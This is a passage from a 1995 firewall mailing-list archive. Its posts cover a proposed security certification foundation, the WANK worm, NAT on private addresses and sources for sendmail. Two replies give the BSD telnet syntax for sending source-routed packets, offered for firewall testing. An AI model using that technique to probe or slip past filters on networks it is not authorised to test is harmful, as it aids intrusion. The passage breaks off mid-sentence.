firewalls-owner@GreatCircle.COM Precedence: bulk I agree, but what it really sounds like is a layer of red tape that most engineers worth half their salt will walk around anyway. There is no way to develop a "certification" that is timely and fair to all vendors and users. I think real world testing is the best -- granted tiger team work doesn't seem to pay but with the attention the net is getting lately maybe their time has finally come. When there is a need, you create a service that people will pay for. I'd rather pay for expertise NOW than await some council to certify something. Mark ______________________________ Reply Separator _________________________________ Subject: Sounds like the politicians are gathering Author: ,padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) at internet Date: 9/11/95 11:19 AM Someone claiming to be the president of the ISSA (no signature) rites: >I agree with this concern. The National Research Council issued a >report on sensitive but unclassified computing in the US entitled >"Computers at Risk." In that report they suggested that an >independent organization be formed, the Information Security ^^^^^^^^^^^ >Foundation. > We are about a talking non-government organization >under the direction and review of industry and the information >security profession {of course with an interface to government). >It is hoped that this organization would be given the authority to >reduce export restrictions. Note that expertise in the subject does not seem to be a requirement (sorry but I have seen too many of these "executive-level" committees formed that spend years trying to figure out an agenda. Have walked out of meetings that I could see headed that way. Also really needs to be *International* organization & do not see how "authority to reduce export restrictions" plays - that is pure *politics*. IFIP might make a good parent but the real question is funding. SAE is funded by members and was created by engineers. Those funded by government grants tend to be politically correct. >IMPORTANT POINT: The ISF (now IISF) would >not be part of ISSA. It is bigger than ISSA or any organization. >The IISF needs to not only provide certification (firewalls, >systems, people, etc.) and testing but standards development and >research. Agree with this but is sounding more like a political plum by the moment & can see there are plenty of chiefs ready to run it. Warmly, Padgett ps not down on the concept, just want to be sure of the agenda. Have seen too many such "councils" in the past where the appointees were those who looked good on TV. From firewalls-owner Mon Sep 11 17:30:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA16900 for firewalls-outgoing; Mon, 11 Sep 1995 17:07:31 -0700 Received: from mvmampc66.ciw.uni-karlsruhe.de (mvmampc66.ciw.uni-karlsruhe.de [129.13.110.66]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA16893 for ; Mon, 11 Sep 1995 17:07:24 -0700 Received: (from ig25@localhost) by mvmampc66.ciw.uni-karlsruhe.de (8.6.12/8.6.12) id CAA02771 for firewalls@greatcircle.com; Tue, 12 Sep 1995 02:06:01 +0200 Message-Id: <199509120006.CAA02771@mvmampc66.ciw.uni-karlsruhe.de> Subject: Re: Firewalls-Digest V4 #518 To: firewalls@greatcircle.com Date: Tue, 12 Sep 1995 02:06:01 +0200 (MET DST) In-Reply-To: <9509111544.AA24311@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 11, 95 10:44:13 am From: Thomas.Koenig@ciw.uni-karlsruhe.de (=?ISO-8859-1?Q?Thomas_K=F6nig?=) X-Mailer: ELM [version 2.4 PL24 ME7a] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Length: 492 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Peter da Silva wrote: >> How can you trust a kernel or OS from HP, SUN, DIGITAL or any vendor who >> wrote UNIX os for sale and yet they never ever review their source code to >> you for certification. >http://freebsd.org/ >http://netbsd.org/ >http://bsdi.com/ While we're at it, you might also include http://www.linux.org/ :-) -- Thomas Koenig, Thomas.Koenig@ciw.uni-karlsruhe.de, ig25@dkauni2.bitnet. The joy of engineering is to find a straight line on a double logarithmic diagram. From firewalls-owner Mon Sep 11 17:32:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA16938 for firewalls-outgoing; Mon, 11 Sep 1995 17:10:34 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA16929 for ; Mon, 11 Sep 1995 17:10:30 -0700 Received: from pm1-28.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA27141; Mon, 11 Sep 95 19:05:23 -0400 Date: Mon, 11 Sep 95 19:05:23 -0400 Message-Id: <9509112305.AA27141@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Julian Assange From: frankw@in.net (Frank Willoughby) Subject: Re: wank worm Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I captured & analyzed the wank worm long ago ('89 sounds about right). The code was some of the *worst* spaghetti-code that I've seen in a long time. The fortune cookie in the wank worm was not a standard fortune cookie and had its own routines to generate the particular fortune. I doubt you want this particular fortune file for your program as the messages generated by the fortune cookie in the wank worm were obscene & vulgar. FWIW, I destroyed the code after the analysis. Out of curiousity, what problem are you trying to solve? I'm sure that other versions of the fortune cookie are still on the net somewhere. Is there a functionality in the fortune cookie that isn't present in later versions? Best Regards, Frank >I know this is off target, but what the heck. > >I am trying to locate specific information that was used in the Wank Worm >circa mid 1989. In particular I am trying to locate the fortune cookie file >that was included in it. I believe the fortunes were pull from the bsd >fortune program. That said finding which versions of fortune where extant >during that period and then finding an existing copy of that version now >has become a little trying. > >If anyone on this list had person experiance with the worm at the time or >can point me to ancient versions of fortune (oldest I could locate was >bsd42/tahoe/reno) I'd certainly appreciate it. > >-Julian Assange (proff@suburbia.net) > > > From firewalls-owner Mon Sep 11 19:00:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA19249 for firewalls-outgoing; Mon, 11 Sep 1995 18:47:52 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA19242 for ; Mon, 11 Sep 1995 18:47:49 -0700 Received: from rssi by relay1.UU.NET with SMTP id QQzgup25152; Mon, 11 Sep 1995 21:46:42 -0400 Received: from bass.rssi.com by rssi (4.1/SMI-4.1) id AA02640; Mon, 11 Sep 95 21:44:35 EDT Received: by bass.rssi.com with Microsoft Mail id <30550E83@bass.rssi.com>; Mon, 11 Sep 95 21:37:23 PDT From: Alex Sharpe To: "'firewalls distribution list'" Cc: "Sean W O'Neill" Subject: Encryption Add-ons to Firewall One? Date: Mon, 11 Sep 95 14:15:00 PDT Message-Id: <30550E83@bass.rssi.com> Encoding: 4 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anyone know of an add-on to Firewall One that provides link encryption to designated IP Addresses? Or, products which can provide this function in a plug and play fashion. From firewalls-owner Mon Sep 11 19:02:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA19097 for firewalls-outgoing; Mon, 11 Sep 1995 18:33:13 -0700 Received: from suc1a.Harris.COM (suc1a.harris.com [192.52.236.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA19089 for ; Mon, 11 Sep 1995 18:33:09 -0700 Received: from itp.corp.harris.com by suc1a.harris.com (5.0/SMI-SVR4) id AA11596; Mon, 11 Sep 1995 21:31:46 -0400 Received: from lazarus.corp.harris.com by itp.corp.harris.com (5.x/SMI-SVR4) id AA24956; Mon, 11 Sep 1995 21:30:44 -0400 Received: by lazarus.corp.harris.com (5.0/SMI-SVR4) id AA06140; Mon, 11 Sep 1995 21:32:10 -0400 Date: Mon, 11 Sep 1995 21:32:10 -0400 From: dave.conklin@Harris.COM (Dave Conklin) Message-Id: <9509120132.AA06140@lazarus.corp.harris.com> To: firewalls@greatcircle.com Subject: Looking for source route packet generator code. X-Sun-Charset: US-ASCII content-length: 183 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi. I'm looking for code that will generate source routed packets so that I may test my firewalls. Anyone with such a beast, please email. TIA. Dave Conklin dave.conklin@harris.com From firewalls-owner Mon Sep 11 22:00:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA23778 for firewalls-outgoing; Mon, 11 Sep 1995 21:40:19 -0700 Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA23769 for ; Mon, 11 Sep 1995 21:40:15 -0700 Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id XAA02572; Mon, 11 Sep 1995 23:34:41 -0500 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma002567; Mon Sep 11 23:34:35 1995 Received: from ignatz (ignatz.bridge.com) by ignatz.bridge.com with SMTP id AA21207 (5.67b/IDA-1.5); Mon, 11 Sep 1995 23:43:32 -0500 Date: Mon, 11 Sep 1995 23:43:31 -0500 (CDT) From: Ken Hardy X-Sender: ken@ignatz To: Dave Conklin Cc: firewalls@greatcircle.com Subject: Re: Looking for source route packet generator code. In-Reply-To: <9509120132.AA06140@lazarus.corp.harris.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 11 Sep 1995, Dave Conklin wrote: > Hi. I'm looking for code that will generate source routed packets so > that I may test my firewalls. Anyone with such a beast, please email. The telnet in the BSD sources will source route if asked to. You ask it by the format of the destination, something like "telnet @hop1@hop2:dest", though you'd better look to be sure; it's not in the man page -- I had too look in the code to figure it out. And the source code is there if you're looking to write your own source routing pgm. - KH From firewalls-owner Mon Sep 11 22:32:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA24735 for firewalls-outgoing; Mon, 11 Sep 1995 22:21:22 -0700 Received: from bob.dataserv.com (bob.dataserv.com [204.73.128.20]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA24728 for ; Mon, 11 Sep 1995 22:21:18 -0700 Received: (from smap@localhost) by bob.dataserv.com (8.6.10/Matt-1.1r1) id AAA00256 for ; Tue, 12 Sep 1995 00:22:08 -0500 Received: from unknown(204.73.140.230) by bob.dataserv.com via smap (V1.3) id sma000254; Tue Sep 12 00:21:45 1995 Received: from msmailgwy.dataserv.com ([204.73.140.229]) by gossip.dataserv.com (8.6.10/Matt-1.0d) with SMTP id AAA16592 for ; Tue, 12 Sep 1995 00:22:07 -0500 Received: by msmailgwy.dataserv.com with Microsoft Mail id <30551977@msmailgwy.dataserv.com>; Tue, 12 Sep 95 00:24:07 CDT From: Sam Howard To: "'Firewalls'" Subject: External Client Access Policy Date: Tue, 12 Sep 95 00:22:00 CDT Message-ID: <30551977@msmailgwy.dataserv.com> Encoding: 25 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi. We here at dataserv are in the position that we will have to let some of our clients access our network (I say "have to" because I am an sysadm, not a sales person :) Does anyone have any "policy" statements that they'd be willing to share? We are looking to have people at our clients sign a "Network Access Agreement" stating things like: thou shalt not do bad things, etc, etc, but the verbiage on that is not anywhere near complete, so I thought I'd ask around for hints...anyone? How about things like an NDA, or Non-Compete (some of the vendors working at a client are direct competitors to us, which is kinda a sticky situation for us...) I seem to recall that some of this stuff might be archived somewhere, but I could not find a reference (we barely have Internet mail right now, so WWW sites are not useful to me at this point...I *can* ftp and telnet, tho). Thanks! Sam -- Sam.Howard@dataserv.com (MS-Mail GW...randomly wraps text lines) showard@dataserv.com (sometimes goes to unix...sometimes insane aliases sends it to MS-Mail anyways...) From firewalls-owner Tue Sep 12 05:00:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA01272 for firewalls-outgoing; Tue, 12 Sep 1995 04:51:25 -0700 Received: from nexus.ptech.com (aegis.ptech.com [165.166.50.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA01265 for ; Tue, 12 Sep 1995 04:51:21 -0700 Received: from felix by nexus.ptech.com (5.x/Piedmont Technology Group) id AA11587; Tue, 12 Sep 1995 07:49:23 -0400 Date: Tue, 12 Sep 1995 07:49:23 -0400 Message-Id: <9509121149.AA11587@nexus.ptech.com> X-Sender: jnb@ptech.com X-Mailer: Windows Eudora Version 2.0.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Alex Sharpe , "'firewalls distribution list'" From: jim.brown@ptech.com (Jim Brown) Subject: Re: Encryption Add-ons to Firewall One? Cc: "Sean W O'Neill" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hughes has a product called NetLock which should fit the bill. For more information, check out the rsa catalog at http://www.rsa.com. (I have no affiliation with either Hughes or RSA. :) jim At 02:15 PM 9/11/95 PDT, Alex Sharpe wrote: > >Anyone know of an add-on to Firewall One that provides link encryption to >designated IP Addresses? Or, products which can provide this function in a >plug and play fashion. > > _________ ___jnb___ From firewalls-owner Tue Sep 12 06:02:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA02331 for firewalls-outgoing; Tue, 12 Sep 1995 05:35:10 -0700 Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA02324 for ; Tue, 12 Sep 1995 05:35:07 -0700 Received: from rssi by relay2.UU.NET with SMTP id QQzgwg15987; Tue, 12 Sep 1995 08:33:49 -0400 Received: from bass.rssi.com by rssi (4.1/SMI-4.1) id AA02196; Tue, 12 Sep 95 08:32:05 EDT Received: by bass.rssi.com with Microsoft Mail id <3055A645@bass.rssi.com>; Tue, 12 Sep 95 08:24:53 PDT From: "Bradley E. Hubbard" To: "'smtp:firewalls@greatcircle.com'" Subject: IPX firewall? Date: Tue, 12 Sep 95 08:23:00 PDT Message-Id: <3055A645@bass.rssi.com> Encoding: 10 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I'm wondering if anyone knows of any firewall products that have been developed in and for an IPX environment? Thanks in advance, Brad Hubbard behubba@rssi.com From firewalls-owner Tue Sep 12 06:02:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA02491 for firewalls-outgoing; Tue, 12 Sep 1995 05:43:12 -0700 Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA02483 for ; Tue, 12 Sep 1995 05:43:09 -0700 Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id IAA15818; Tue, 12 Sep 1995 08:36:06 -0400 Date: Tue, 12 Sep 1995 08:36:06 -0400 (EDT) From: David Miller Subject: Re: Looking for source route packet generator code. To: Dave Conklin cc: firewalls@greatcircle.com In-Reply-To: <9509120132.AA06140@lazarus.corp.harris.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 11 Sep 1995, Dave Conklin wrote: > Hi. I'm looking for code that will generate source routed packets so > that I may test my firewalls. Anyone with such a beast, please email. Comes builtin to many of the bsd telnets. FreeBSD and bsd/os certaily have it. The catch is that it's only "documented" in the source code. Use it with a "telnet @host1@host2@host3.somewhere.dom" where host1 and host2 are the hosts to pass through. And you must type the "@"'s just as shown here:) Hope this helps, --- David ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! From firewalls-owner Tue Sep 12 08:34:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA05752 for firewalls-outgoing; Tue, 12 Sep 1995 08:25:14 -0700 Received: from dot.ability.net (dot.ability.net [205.197.67.12]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA05730 for ; Tue, 12 Sep 1995 08:25:09 -0700 Received: from yakko.ability.net (dkrapf@yakko.ability.net [204.192.126.17]) by dot.ability.net (8.6.12/8.6.12) with ESMTP id LAA26058 for ; Tue, 12 Sep 1995 11:22:19 -0400 From: Don Krapf Received: (dkrapf@localhost) by yakko.ability.net (8.6.12/8.6.12) id LAA06616 for firewalls@greatcircle.com; Tue, 12 Sep 1995 11:22:26 -0400 Message-Id: <199509121522.LAA06616@yakko.ability.net> Subject: Re: firewall with only one IP address ??? To: firewalls@greatcircle.com (FireWalls List) Date: Tue, 12 Sep 1995 11:22:25 -0400 (EDT) In-Reply-To: <950905061735_100632.1345_BHL70-1@CompuServe.COM> from "matt" at Sep 5, 95 02:17:35 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 514 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk matt writes: > > Hi all, > > we have one question: > Our firm now wants to connect to the internet, but we will get only > one official IP-address. First, we believed this would be no problem > because we'll use the 10.0.0.0 net as our internal network and we > will be able to manage the connections over proxies. Why not buy access for a full network instead of a single address? You're not trying to hide a network behind a single address to avoid paying your ISP for routing to your network, are you? Don From firewalls-owner Tue Sep 12 10:04:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA07345 for firewalls-outgoing; Tue, 12 Sep 1995 09:36:22 -0700 Received: from netcomsv.netcom.com (uucp2.netcom.com [163.179.3.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA07330 for ; Tue, 12 Sep 1995 09:36:18 -0700 Received: by netcomsv.netcom.com with UUCP (8.6.12/SMI-4.1) id JAA27653; Tue, 12 Sep 1995 09:27:41 -0700 Received: by compwr.com (4.1/) id AA01600; Tue, 12 Sep 95 09:24:35 PDT Date: Tue, 12 Sep 1995 09:24:34 -0700 (PDT) From: Ken Dayton X-Sender: kd@sparcB To: Firewalls@GreatCircle.Com Subject: Secure version of Sendmail Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings: I have heard of a public domain version of sendmail (with source) that is available somewhere. Does anyone know where to get it? Thanks. Ken Dayton CommPower Inc., Camarillo CA From firewalls-owner Tue Sep 12 10:22:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA07705 for firewalls-outgoing; Tue, 12 Sep 1995 09:45:22 -0700 Received: from usasmtp.usagroup.org ([198.70.128.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA07698 for ; Tue, 12 Sep 1995 09:45:18 -0700 Received: from DOMAIN-E-Message_Server by usasmtp.usagroup.org with Novell_GroupWise; Tue, 12 Sep 1995 11:45:36 -0600 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Tue, 12 Sep 1995 11:42:18 -0600 From: Ed Hepker To: Firewalls@GreatCircle.COM Subject: Compuserve & Internet Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anybody have any thoughts on the best way to allow employees to use Compuserve (we have a business requirement to do so) and prevent them from accessing the net through it? Obviously, this kind of access can kabosh the benefits of our firewall. I haven't found a decent way to do this yet, so any thoughts/experiences would be appreciated. Thanks in advance - Ed Hepker USA GROUP Indianapolis, Indiana ehepker@usasmtp.usagroup.org These comments do not represent or resemble any opinions currently or previously held by USA GROUP (or anyone else, for that matter). From firewalls-owner Tue Sep 12 10:30:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA08390 for firewalls-outgoing; Tue, 12 Sep 1995 10:08:56 -0700 Received: from westie.mid.net (westie.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA08383 for ; Tue, 12 Sep 1995 10:08:51 -0700 Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by westie.mid.net (8.6.10/8.6.9) with ESMTP id MAA16098; Tue, 12 Sep 1995 12:07:10 -0500 Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id MAA14465; Tue, 12 Sep 1995 12:07:10 -0500 From: Alan Hannan Message-Id: <199509121707.MAA14465@gaijin.mid.net> Subject: Re: firewall with only one IP address ??? To: dkrapf@ability.net (Don Krapf) Date: Tue, 12 Sep 1995 12:07:09 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199509121522.LAA06616@yakko.ability.net> from "Don Krapf" at Sep 12, 95 11:22:25 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2317 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk matt> Hi all, matt> matt> we have one question: matt> Our firm now wants to connect to the internet, but we will get only matt> one official IP-address. First, we believed this would be no problem matt> because we'll use the 10.0.0.0 net as our internal network and we matt> will be able to manage the connections over proxies. Matt, this will work fine. krapf> Why not buy access for a full network instead of a single address? krapf> You're not trying to hide a network behind a single address to avoid krapf> paying your ISP for routing to your network, are you? Good heavans. Using an RFC1597 network makes sense for so many reasons, none of which you have even attempted to rebut. The amount of networks routed is a signficant issue. Many months ago, people grabbed address space and announced a tremendous amount of routes, to networks which they did not utilize very well. Accordingly, the equipment on the backbone was outdated, put to stress, and caused CIDR and other aggregation methods. To imply that one is "cheap" for being responsible with address space is silly. Also, we gain significant security advantages by putting our internal networks on RFC1597 networks. First, we lose the ability for internet sites to directly attack our internal hosts, as the routes are not propogated through the internet. Secondly, it gains us larger address space that we can use without registering or notifying anyone. Third, it gives one the ability to implement a /8 internal network structure within one's network. IMHO, using rfc1597 for internal networks protected by a firewall is a good thing, for the above reasons and others. So far as I can see, the only downside to using RFC1597 on an internal firewalled network is that IF someday one decides to do away with the firewall, then the company will incur moderately large renumbering costs. My thought is that this is a small risk, and even if it were to happen, it is likely bootp, dhcp, or some variant will have evolved far enough to make this a non-issue. $0.02 -- Alan Hannan Email: alan@mid.net Network Systems Administrator Voice: (402) 472-0239 MIDnet, Lincoln NOC Office Fax: (402) 472-0240 "The only way to make a man trustworthy is to trust him" - Henry Stimson From firewalls-owner Tue Sep 12 10:34:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA09363 for firewalls-outgoing; Tue, 12 Sep 1995 10:30:27 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA09348 for ; Tue, 12 Sep 1995 10:30:20 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id MAA13967; Tue, 12 Sep 1995 12:27:36 -0500 Message-Id: <199509121727.MAA13967@psisa.com> Subject: Re: firewall with only one IP address ??? To: dkrapf@ability.net (Don Krapf) Date: Tue, 12 Sep 1995 12:27:35 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199509121522.LAA06616@yakko.ability.net> from "Don Krapf" at Sep 12, 95 11:22:25 am From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 2219 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > we have one question: > > Our firm now wants to connect to the internet, but we will get only > > one official IP-address. First, we believed this would be no problem > > because we'll use the 10.0.0.0 net as our internal network and we > > will be able to manage the connections over proxies. > > Why not buy access for a full network instead of a single address? You're > not trying to hide a network behind a single address to avoid paying your > ISP for routing to your network, are you? What's your point, Inquisitor? It's perfectly fine to "hide" several thousand machines behind one IP (or a couple in case you scale firewalls dynamically as we do). I do this here (see sig) for our client all the time. And when our client asked their provider for connectivity, they knew what they were getting. I mean, afterall this is not about IPs, this is about bandwidth. And everybody will wake up if you ask for a T3 with only one registered address. I mean, you're not going to connect a zillion users of a 28k8 dialup line.... get real and chill, and get a life since you won't stay long in biz with that attitude. Besides, it's pretty unbelievable if someone charges for routing my IPs, unless I expect them to do something very extravagant with it (like dynamic routing for multiple ports of entry for redundancy and providing network management via a NOC). I'm buying *connectivity*, and routing is a neccessity for it. It's like buying a new car and tires are considered a preferred customer option. Last point, it's simply not my provider's business to know how many IPs I'm using internally nor anything else. All you need is rock solid connectivity to the firewall. That's what one pays for. And telling a provider (as any other external company) about my network/system config usually violates security policies anyways. Maybe one should issue a public warning not to do business with disability.net. Dizzy from shaking my head, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz +1 914-684-4467 | _/\__ \| \ \ Pencom System Administration Services fax: +1 914-684-3791 |_| /___/|_|__\ on-location at Advantis/IBM Global Network, White Plains, NY From firewalls-owner Tue Sep 12 11:00:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA10472 for firewalls-outgoing; Tue, 12 Sep 1995 10:56:18 -0700 Received: from blob.best.net (blob.best.net [204.156.128.88]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA10457 for ; Tue, 12 Sep 1995 10:56:13 -0700 Received: from shell1.best.com (shell1.best.com [204.156.128.10]) by blob.best.net (8.6.12/8.6.5) with ESMTP id KAA09436 for ; Tue, 12 Sep 1995 10:54:49 -0700 Received: from best.com (yobie.vip.best.com [204.156.155.53]) by shell1.best.com (8.6.12/8.6.5) with SMTP id KAA17051 for ; Tue, 12 Sep 1995 10:54:37 -0700 Date: Tue, 12 Sep 1995 10:54:37 -0700 Message-Id: <199509121754.KAA17051@shell1.best.com> From: Yobie Benjamin To: firewalls@GreatCircle.COM Subject: Re: firewall with only one IP address ??? X-Mailer: ProntoIP [version 1.0] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Agreed with Don: What's the deal? A class C will give you 256 IP addresses and most corporations can qualify for this. Maybe you should go to some of the larger ISPs if you're having a problem. From firewalls-owner Tue Sep 12 11:02:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA09928 for firewalls-outgoing; Tue, 12 Sep 1995 10:39:34 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA09920 for ; Tue, 12 Sep 1995 10:39:29 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id MAA14128; Tue, 12 Sep 1995 12:36:47 -0500 Message-Id: <199509121736.MAA14128@psisa.com> Subject: Re: Secure version of Sendmail To: kd@compwr.com (Ken Dayton) Date: Tue, 12 Sep 1995 12:36:47 -0500 (CDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "Ken Dayton" at Sep 12, 95 09:24:34 am From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 654 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I have heard of a public domain version of sendmail (with source) > that is available somewhere. Does anyone know where to get it? The state-of-the-art Sendmail V8 can be found at ftp://ftp.cs.berkeley.edu/ucb/sendmail. Bugs are fixed immediately. Sendmail is quasi public domain (check the license out for details). Enjoy and drop me a note if you need help getting started. Best Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz +1 914-684-4467 | _/\__ \| \ \ Pencom System Administration Services fax: +1 914-684-3791 |_| /___/|_|__\ on-location at Advantis/IBM Global Network, White Plains, NY From firewalls-owner Tue Sep 12 11:28:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA10097 for firewalls-outgoing; Tue, 12 Sep 1995 10:42:31 -0700 Received: from sunthing.sjsinc.com (sunthing.sjsinc.com [140.174.165.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA10090 for ; Tue, 12 Sep 1995 10:42:27 -0700 Received: by sunthing.sjsinc.com Mailer: sendmail (8.6.12/8.6.9) Protocol: Id: KAA14241; Tue, 12 Sep 1995 10:40:39 -0700 Date: Tue, 12 Sep 1995 10:40:39 -0700 From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) Message-Id: <199509121740.KAA14241@sjsinc.com> To: firewalls@greatcircle.com Subject: Re: Secure version of Sendmail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ken: > > I have heard of a public domain version of sendmail (with source) > that is available somewhere. Does anyone know where to get it? > "The source Luke, all answers are in the source...." The guys who write it hang out at: ftp://ftp.cs.berkeley.edu and one can "___ALWAYS___" find the latest release and bug-fixes here... Regards, b c++'ing u, %-) sjs ------------------------------------------------------------------------------- Stefan Jon Silverman - President SJS Associates, N.A., Inc. 572 Chestnut Street Distributed Systems Architecture & Implementation San Francisco, Ca. 94133 Phone: 415 989 2741 Fax: 415 989 7250 E-mail: sjs@sjsinc.com Cell: 415 519 3494 ------------------------------------------------------------------------------- Weebles wobble, but they don't fall down!!! ------------------------------------------------------------------------------- From firewalls-owner Tue Sep 12 11:34:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA10792 for firewalls-outgoing; Tue, 12 Sep 1995 11:02:16 -0700 Received: from Disclosure.COM (di.disclosure.com [205.156.194.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA10761 for ; Tue, 12 Sep 1995 11:02:06 -0700 From: gregg@smtpgate.Disclosure.COM Received: from smtpgate.disclosure.com by Disclosure.COM (4.1/SMI-4.1) id AA29369; Tue, 12 Sep 95 14:03:45 EDT Received: from cc:Mail by smtpgate.disclosure.com id AA810939662; Tue, 12 Sep 95 13:56:48 est Date: Tue, 12 Sep 95 13:56:48 est Message-Id: <9508128109.AA810939662@smtpgate.disclosure.com> To: Firewalls@Greatcircle.COM Subject: Re: Re: Interpreting CERT advisories Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jet - (J.Eric Townsend-jet@abulafia.genmagic.com) writes: ==> How many MVS systems are plugged directly into the internet? How many ==> are actually used for TCP/IP related services? (Where's my Mosaic for ==> MVS? :-) ==> IMHO, Suns get broken into all the time because: ==> -- everybody has one to practice on ==> -- they were designed with being useful in mind. ITEM 1: ==> IMHO, Suns get broken into all the time because: ==> -- everybody has one to practice on Excuse me?!? MVS has been *in production* since the late 70's; abundantly installed around the World. IMHO, plenty of time/opportunity for hackers to try hacking in. The reason you don't hear about hackers hacking MVS is because, well, you can't. Much too difficult. In 